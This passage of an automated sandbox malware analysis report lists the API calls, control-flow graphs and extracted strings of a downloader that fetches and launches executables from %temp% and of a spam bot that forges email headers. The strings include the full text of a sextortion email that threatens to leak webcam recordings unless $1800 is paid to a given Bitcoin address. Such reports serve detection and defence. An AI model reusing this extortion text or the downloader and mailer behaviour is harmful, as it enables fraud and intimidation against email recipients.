                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 002A13C5
                                                                                • %s\%d%d.exe, xrefs: 002A13A8
                                                                                • %ls:Zone.Identifier, xrefs: 002A14C9
                                                                                • %temp%, xrefs: 002A134B
                                                                                • %ls:Zone.Identifier, xrefs: 002A1611
                                                                                • %s\%d%d.exe, xrefs: 002A15CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$Open$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcsmemsetsrandstrlen
                                                                                • String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 789862300-1471993759
                                                                                • Opcode ID: 7d05e475dce258b49ca6c0cd919414dd10db237fc49807f663e7fc01f28aef13
                                                                                • Instruction ID: f14b94b1027457e26a101ffc23f073e0591c59580323e0f8cfa20e1de0a05ead
                                                                                • Opcode Fuzzy Hash: 7d05e475dce258b49ca6c0cd919414dd10db237fc49807f663e7fc01f28aef13
                                                                                • Instruction Fuzzy Hash: BD81D7B5D10314ABD720DB64EC4EFE97379AB8A700F048498F70A921C1DEB59BA4CF61

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 135 2a1690-2a16f0 memset * 2 CreateProcessW 136 2a16f2-2a16ff Sleep 135->136 137 2a1701-2a1725 ShellExecuteW 135->137 138 2a1738-2a173b 136->138 139 2a1736 137->139 140 2a1727-2a1734 Sleep 137->140 139->138 140->138
                                                                                APIs
                                                                                • memset.MSVCR90 ref: 002A169E
                                                                                • memset.MSVCR90 ref: 002A16AE
                                                                                • CreateProcessW.KERNEL32(00000000,002A166B,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 002A16E7
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A16F7
                                                                                • ShellExecuteW.SHELL32(00000000,open,002A166B,00000000,00000000,00000000), ref: 002A1712
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A172C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: 16483613048dec63692fb9cc685c317d4729d4579adc52139a4ba64559844fb6
                                                                                • Instruction ID: 45ecbecd0f3fd9295d8ade28c10d56813c75756ecbeadf73979afcdc8716a544
                                                                                • Opcode Fuzzy Hash: 16483613048dec63692fb9cc685c317d4729d4579adc52139a4ba64559844fb6
                                                                                • Instruction Fuzzy Hash: AD112175A90308BBEB10DF90DD4AF9DB778AB16B11F204115FA096F2C0DBB1AA148B65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 141 2a1790-2a17b4 InternetOpenA 142 2a1828-2a1839 Sleep 141->142 143 2a17b6-2a17d3 InternetOpenUrlA 141->143 144 2a181e-2a1822 InternetCloseHandle 143->144 145 2a17d5-2a17fc HttpQueryInfoA 143->145 144->142 146 2a17fe-2a1806 145->146 147 2a1814-2a1818 InternetCloseHandle 145->147 146->147 148 2a1808-2a1810 146->148 147->144 148->147
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 002A17A7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002A17C6
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 002A17EF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 002A1818
                                                                                • InternetCloseHandle.WININET(00000000), ref: 002A1822
                                                                                • Sleep.KERNEL32(000003E8), ref: 002A182D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 002A17A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1846603424.00000000002A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.1846589371.00000000002A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846619040.00000000002A3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000009.00000002.1846673406.00000000002A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_winploravr.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-173034443
                                                                                • Opcode ID: dd08256abb87a38a1370cae91ac6d218b0de16c8d5fac229e77477a31ddbf496
                                                                                • Instruction ID: 8572b958d8859f3caa8a2f87886d042604509b31cf541c7cd445d655d2942110
                                                                                • Opcode Fuzzy Hash: dd08256abb87a38a1370cae91ac6d218b0de16c8d5fac229e77477a31ddbf496
                                                                                • Instruction Fuzzy Hash: EC210A75E40208FFEB10DFA4DC49F9EB7B5AB09705F108498FA15AB2C0CBB56A14CB61

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_00D71756 1 Function_00D72A55 53 Function_00D72EA1 1->53 2 Function_00D726D2 3 Function_00D717D0 37 Function_00D71400 3->37 45 Function_00D718B0 3->45 4 Function_00D718D0 5 Function_00D72BDE 6 Function_00D72E5C 7 Function_00D72EDA 8 Function_00D72FD8 9 Function_00D728C7 9->6 29 Function_00D72D90 9->29 9->53 55 Function_00D72720 9->55 10 Function_00D72A41 11 Function_00D72FC0 12 Function_00D711C0 13 Function_00D71440 14 Function_00D72D40 15 Function_00D72CCA 16 Function_00D71470 17 Function_00D71C7C 17->12 22 Function_00D71160 17->22 56 Function_00D71120 17->56 18 Function_00D726E0 19 Function_00D719E0 19->12 19->22 38 Function_00D72300 19->38 54 Function_00D710A0 19->54 20 Function_00D71760 21 Function_00D716E0 20->21 21->13 46 Function_00D71230 22->46 23 Function_00D72BE8 23->6 34 Function_00D72C84 23->34 23->53 24 Function_00D72292 24->12 24->22 24->56 25 Function_00D72B91 26 Function_00D72A91 26->53 27 Function_00D71390 28 Function_00D71490 29->14 39 Function_00D72D00 29->39 30 Function_00D7121D 31 Function_00D72E1B 32 Function_00D72B87 42 Function_00D72F08 32->42 33 Function_00D72F05 35 Function_00D72881 40 Function_00D72C8D 35->40 36 Function_00D71000 40->23 41 Function_00D72A8D 43 Function_00D71BB6 43->12 43->22 43->56 44 Function_00D72EB5 47 Function_00D72430 47->3 47->4 47->18 48 Function_00D72FBD 49 Function_00D71C27 49->12 49->22 49->56 50 Function_00D72AA6 50->7 50->33 51 Function_00D72CA4 50->51 52 Function_00D72424 54->13 55->20 55->36 57 Function_00D71320 58 Function_00D72320 58->19 58->37 58->45 59 Function_00D72E2F 60 Function_00D71B2D 60->12 60->22 60->56 61 Function_00D71CAB 61->12 61->22 61->27 61->28 61->56 61->57

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00D7272E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,4463464*), ref: 00D7273D
                                                                                • GetLastError.KERNEL32 ref: 00D72749
                                                                                • ExitProcess.KERNEL32 ref: 00D72758
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D72776
                                                                                • wsprintfW.USER32 ref: 00D7278F
                                                                                • DeleteFileW.KERNELBASE(?), ref: 00D7279F
                                                                                • WSAStartup.WS2_32(00000202,?), ref: 00D727B1
                                                                                • ExitProcess.KERNEL32 ref: 00D727C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: ExitFileProcess$CreateDeleteErrorLastModuleMutexNameSleepStartupwsprintf
                                                                                • String ID: %s:Zone.Identifier$4463464*
                                                                                • API String ID: 3138769648-2805003198
                                                                                • Opcode ID: 53df50657f0e002e8b0dea3b35a54845ce2534f6b801dbe9665ae803fcf2d7db
                                                                                • Instruction ID: 210940c09b7c4dd08c64f15eb83cdc5dd3e722589298b2a955ba8662ce84c9d4
                                                                                • Opcode Fuzzy Hash: 53df50657f0e002e8b0dea3b35a54845ce2534f6b801dbe9665ae803fcf2d7db
                                                                                • Instruction Fuzzy Hash: E4218071A40318ABE7215BA0DC0EFA97739EB14B02F408054FB0DE52D1FBB059C88E71

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 12 d71760-d7178a DnsQuery_A 13 d717bf-d717ca DnsFree 12->13 14 d7178c-d71795 call d716e0 12->14 16 d717cc-d717cf 13->16 17 d7179a-d717a4 14->17 17->13 18 d717a6-d717bd DnsFree closesocket 17->18 18->16
                                                                                APIs
                                                                                • DnsQuery_A.DNSAPI(yahoo.com,0000000F,00000000,00000000,00000000,00000000), ref: 00D7177E
                                                                                • DnsFree.DNSAPI(00000000,00000001), ref: 00D717AC
                                                                                • closesocket.WS2_32(00000000), ref: 00D717B5
                                                                                • DnsFree.DNSAPI(00000000,00000001), ref: 00D717C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: Free$Query_closesocket
                                                                                • String ID: yahoo.com
                                                                                • API String ID: 1946217314-667638125
                                                                                • Opcode ID: dd0ec95c6355247bd530b173eede6df7573a2c5c5fa60f895911a490ae20bf03
                                                                                • Instruction ID: 2f484909901752c65e2b7dc7482c558af32d5924a8b4a66a8f5a521a5a116bae
                                                                                • Opcode Fuzzy Hash: dd0ec95c6355247bd530b173eede6df7573a2c5c5fa60f895911a490ae20bf03
                                                                                • Instruction Fuzzy Hash: F9011279E40308FBDB10EFE4D946B9D7778AB44704F20C199E6046B281E7769A45EB70

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 19 d716e0-d716f9 call d71440 22 d71700-d71731 htons socket 19->22 23 d716fb-d716fe 19->23 25 d71733-d71738 22->25 26 d7173a-d7174d connect 22->26 24 d7175b-d7175e 23->24 25->24 27 d7174f-d71754 26->27 28 d71758 26->28 27->24 28->24
                                                                                APIs
                                                                                  • Part of subcall function 00D71440: inet_addr.WS2_32(00D710D9), ref: 00D7144A
                                                                                  • Part of subcall function 00D71440: gethostbyname.WS2_32(?), ref: 00D7145D
                                                                                • htons.WS2_32(?), ref: 00D71714
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00D71724
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: gethostbynamehtonsinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 230923099-0
                                                                                • Opcode ID: cda45da48dcbf4e36c5c405dc04883787ffe7fe767adb51bb6535c10018e3224
                                                                                • Instruction ID: 258a6a5469329147987c577d9317b155a471a68a331859ae94cf30ed14cad416
                                                                                • Opcode Fuzzy Hash: cda45da48dcbf4e36c5c405dc04883787ffe7fe767adb51bb6535c10018e3224
                                                                                • Instruction Fuzzy Hash: 56017178D00308EBCB14DBB8D84AABD7B75AF14334F608355F929A72D0F7708A8197A1

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 29 d71440-d71457 inet_addr 30 d7147f 29->30 31 d71459-d7146a gethostbyname 29->31 34 d71482-d71485 30->34 32 d71472-d7147c 31->32 33 d7146c-d7146e 31->33 32->30 33->34
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID:
                                                                                • API String ID: 1594361348-0
                                                                                • Opcode ID: a5664c391f6302b378dca007edf067b6ea1960b4c15510aa6751012ae3eb3c8f
                                                                                • Instruction ID: 3bb3765b20d07d84f931cfd16b8379c68c787e43f14ac85f51957176909d3f9c
                                                                                • Opcode Fuzzy Hash: a5664c391f6302b378dca007edf067b6ea1960b4c15510aa6751012ae3eb3c8f
                                                                                • Instruction Fuzzy Hash: 1AF09E78900308EFCB10DFB4D54499DBBB5EB59315F60C795DD5997350E7309A80DB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 193 d71490-d71522 194 d71524-d7152e GetLocalTime 193->194 195 d71530-d7154c FileTimeToLocalFileTime FileTimeToSystemTime 193->195 196 d71552-d71579 GetTimeZoneInformation 194->196 195->196 197 d71584-d7158c 196->197 198 d7157b-d71581 196->198 199 d7158e-d71597 197->199 200 d71599-d7159e 197->200 198->197 201 d715a4-d715b4 199->201 200->201 202 d715b6-d715bb 201->202 203 d715bf-d715c5 201->203 202->203 204 d715c7-d715cc 203->204 205 d715d0-d715d7 203->205 204->205 206 d715e2-d715e6 205->206 207 d715d9-d715de 205->207 208 d71659-d7165d 206->208 209 d715e8-d715ec 206->209 207->206 212 d7165f-d71669 208->212 213 d7166b 208->213 210 d715ee-d715f8 209->210 211 d715fa 209->211 214 d71604-d71657 wsprintfA 210->214 211->214 215 d71675-d716ce wsprintfA 212->215 213->215 216 d716d1-d716d4 214->216 215->216
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00D71528
                                                                                • FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 00D7153B
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7154C
                                                                                • GetTimeZoneInformation.KERNEL32(00000000), ref: 00D71563
                                                                                • wsprintfA.USER32 ref: 00D7164E
                                                                                • wsprintfA.USER32 ref: 00D716C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$Localwsprintf$InformationSystemZone
                                                                                • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$%u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                • API String ID: 1439763326-1766317088
                                                                                • Opcode ID: 13b3e85dde54326ccc04ac7d1772e64c60eae4e8b429a760e254f9c104042fd0
                                                                                • Instruction ID: 8f4613da2e142642a24ef9086d414da86282202c10973488b6d2fd83c52c68c8
                                                                                • Opcode Fuzzy Hash: 13b3e85dde54326ccc04ac7d1772e64c60eae4e8b429a760e254f9c104042fd0
                                                                                • Instruction Fuzzy Hash: F161D4B4900258DBCB15CFC9D844AEEBBB9BF88305F508149E549AB254E7788A94CB74

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00D717E3
                                                                                • InternetOpenUrlA.WININET(00000000,http://icanhazip.com/,00000000,00000000,00000000,00000000), ref: 00D71807
                                                                                • InternetReadFile.WININET(00000000,?,00000063,?), ref: 00D71824
                                                                                  • Part of subcall function 00D718B0: strstr.MSVCR90 ref: 00D718BB
                                                                                • wsprintfA.USER32 ref: 00D71860
                                                                                • wsprintfA.USER32 ref: 00D71875
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00D71882
                                                                                • wsprintfA.USER32 ref: 00D71894
                                                                                • InternetCloseHandle.WININET(?), ref: 00D718A1
                                                                                Strings
                                                                                • http://icanhazip.com/, xrefs: 00D717FE
                                                                                • [0.0.0.0], xrefs: 00D7188A
                                                                                • [0.0.0.0], xrefs: 00D7186B
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36, xrefs: 00D717DE
                                                                                • [%s], xrefs: 00D71856
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$wsprintf$CloseHandleOpen$FileReadstrstr
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36$[%s]$[0.0.0.0]$[0.0.0.0]$http://icanhazip.com/
                                                                                • API String ID: 2936383407-4046155809
                                                                                • Opcode ID: 6393a6612f17b26e5013ce7fad83e4e1063b8735c0cf9de21c461a2b96a7ba0a
                                                                                • Instruction ID: 5490b44259465630daea361d3468a352239e9c9993f2d9c95b807c0b5654e260
                                                                                • Opcode Fuzzy Hash: 6393a6612f17b26e5013ce7fad83e4e1063b8735c0cf9de21c461a2b96a7ba0a
                                                                                • Instruction Fuzzy Hash: D6214175A80304ABD711ABF8DC0AF9D7B34AB14B05F648618F90DA7281F7709548CB75

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00D71320: GetTickCount.KERNEL32 ref: 00D7132A
                                                                                  • Part of subcall function 00D71320: srand.MSVCR90 ref: 00D71331
                                                                                  • Part of subcall function 00D71320: rand.MSVCR90 ref: 00D71353
                                                                                  • Part of subcall function 00D71320: sprintf.MSVCR90 ref: 00D7136E
                                                                                • wsprintfA.USER32 ref: 00D71CC9
                                                                                  • Part of subcall function 00D71490: GetLocalTime.KERNEL32(?), ref: 00D71528
                                                                                  • Part of subcall function 00D71490: GetTimeZoneInformation.KERNEL32(00000000), ref: 00D71563
                                                                                  • Part of subcall function 00D71490: wsprintfA.USER32 ref: 00D7164E
                                                                                • Sleep.KERNEL32(000007D0), ref: 00D71CEA
                                                                                  • Part of subcall function 00D71490: FileTimeToLocalFileTime.KERNEL32(00000000,?), ref: 00D7153B
                                                                                  • Part of subcall function 00D71490: FileTimeToSystemTime.KERNEL32(?,?), ref: 00D7154C
                                                                                • rand.MSVCR90 ref: 00D71D11
                                                                                • rand.MSVCR90 ref: 00D71D22
                                                                                • rand.MSVCR90 ref: 00D71D33
                                                                                • rand.MSVCR90 ref: 00D71D44
                                                                                  • Part of subcall function 00D71390: rand.MSVCR90 ref: 00D713A0
                                                                                  • Part of subcall function 00D71390: rand.MSVCR90 ref: 00D713CD
                                                                                • wsprintfA.USER32 ref: 00D71D73
                                                                                  • Part of subcall function 00D71120: lstrlenA.KERNEL32(?), ref: 00D7112D
                                                                                  • Part of subcall function 00D71120: send.WS2_32(?,?,000000FF,00000000), ref: 00D71144
                                                                                • wsprintfA.USER32 ref: 00D71DE3
                                                                                • shutdown.WS2_32(000000FF,00000002), ref: 00D722C3
                                                                                • closesocket.WS2_32(000000FF), ref: 00D722CD
                                                                                Strings
                                                                                • After that I removed my malware to not leave any traces., xrefs: 00D720B0
                                                                                • https://nexo.com/buy-crypto/bitcoin-btc, xrefs: 00D72177
                                                                                • Mime-Version: 1.0, xrefs: 00D71FB6
                                                                                • Unfortunately, there are some bad news for you., xrefs: 00D72024
                                                                                • My Bitcoin (BTC) address is: 19Y9VkeeSUNgqm6qbSy6Zkpk9oHaS3eHXT, xrefs: 00D721EF
                                                                                • https://paybis.com/, xrefs: 00D7219F
                                                                                • Everything will be carried out based on fairness., xrefs: 00D7223F
                                                                                • After that send the Bitcoin (BTC) directly to my wallet, or install the free software: Atomicwallet, or: Exodus wallet, then receive and send to mine., xrefs: 00D721DB
                                                                                • Yes, that's how the address looks like, copy and paste my address, it's (cAsE-sEnSEtiVE)., xrefs: 00D72203
                                                                                • https://cex.io/buy-bitcoins, xrefs: 00D72163
                                                                                • Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s, xrefs: 00D71D67
                                                                                • As I got access to this email account, I will know if this email has already been read., xrefs: 00D7222B
                                                                                • All you need is $1800 USD in Bitcoin (BTC) transfer to my account., xrefs: 00D720D8
                                                                                • Or simply google other exchanger., xrefs: 00D721C7
                                                                                • Date: %s, xrefs: 00D71EFF
                                                                                • My trojan allowed me to access your files, accounts and your camera., xrefs: 00D7204C
                                                                                • From: %s, xrefs: 00D71E20
                                                                                • Hello there!, xrefs: 00D72010
                                                                                • You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun., xrefs: 00D72088
                                                                                • Be sure, I keep my promises., xrefs: 00D7213B
                                                                                • You can easily buy Bitcoin (BTC) here:, xrefs: 00D7214F
                                                                                • Content-type: text/plain;, xrefs: 00D71FD9
                                                                                • Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google., xrefs: 00D72038
                                                                                • After the transaction is successful, I will proceed to delete everything., xrefs: 00D720EC
                                                                                • If you still doubt my serious intentions, it only takes couple mouse clicks to share the video of you with your friends, relatives, all email contacts, on social networks, the darknet and to publish all your files., xrefs: 00D720C4
                                                                                • https://bitpay.com/buy-bitcoin/?crypto=BTC, xrefs: 00D7218B
                                                                                • Received: (qmail %s invoked by uid %s); %s, xrefs: 00D71DD7
                                                                                • I RECORDED YOU!, xrefs: 00D71EAE
                                                                                • An advice from me, regularly change all your passwords to your accounts and update your device with newest security patches.., xrefs: 00D72253
                                                                                • To: %s, xrefs: 00D71E69
                                                                                • I RECORDED YOU (through your camera) SATISFYING YOURSELF!, xrefs: 00D7209C
                                                                                • %s.com, xrefs: 00D71CBD
                                                                                • Subject: %s, xrefs: 00D71EB3
                                                                                • You are given not more than 3 days after you have opened this email., xrefs: 00D72217
                                                                                • https://invity.io/buy-crypto, xrefs: 00D721B3
                                                                                • Check the sender of this email, I have sent it from your email account., xrefs: 00D72060
                                                                                • To make sure you read this email, you will receive it multiple times., xrefs: 00D72074
                                                                                • Message-ID: <%s.%s@%s>, xrefs: 00D71F6F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2105995943.0000000000D71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00D70000, based on PE: true
                                                                                • Associated: 0000000A.00000002.2105981650.0000000000D70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106010574.0000000000D74000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106024579.0000000000D76000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.2106048378.0000000000D78000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_d70000_2006625995.jbxd
                                                                                Similarity
                                                                                • API ID: rand$Time$wsprintf$File$Local$CountInformationSleepSystemTickZoneclosesocketlstrlensendshutdownsprintfsrand
                                                                                • String ID: %s.com$After that I removed my malware to not leave any traces.$After that send the Bitcoin (BTC) directly to my wallet, or install the free software: Atomicwallet, or: Exodus wallet, then receive and send to mine.$After the transaction is successful, I will proceed to delete everything.$All you need is $1800 USD in Bitcoin (BTC) transfer to my account.$An advice from me, regularly change all your passwords to your accounts and update your device with newest security patches..$As I got access to this email account, I will know if this email has already been read.$Be sure, I keep my promises.$Check the sender of this email, I have sent it from your email account.$Content-type: text/plain;$Date: %s$Everything will be carried out based on fairness.$From: %s$Hello there!$I RECORDED YOU (through your camera) SATISFYING YOURSELF!$I RECORDED YOU!$If you still doubt my serious intentions, it only takes couple mouse clicks to share the video of you with your friends, relatives, all email contacts, on social networks, the darknet and to publish all your files.$Message-ID: <%s.%s@%s>$Mime-Version: 1.0$My Bitcoin (BTC) address is: 19Y9VkeeSUNgqm6qbSy6Zkpk9oHaS3eHXT$My trojan allowed me to access your files, accounts and your camera.$Or simply google other exchanger.$Received: (qmail %s invoked by uid %s); %s$Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s$Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.$Subject: %s$To make sure you read this email, you will receive it multiple times.$To: %s$Unfortunately, there are some 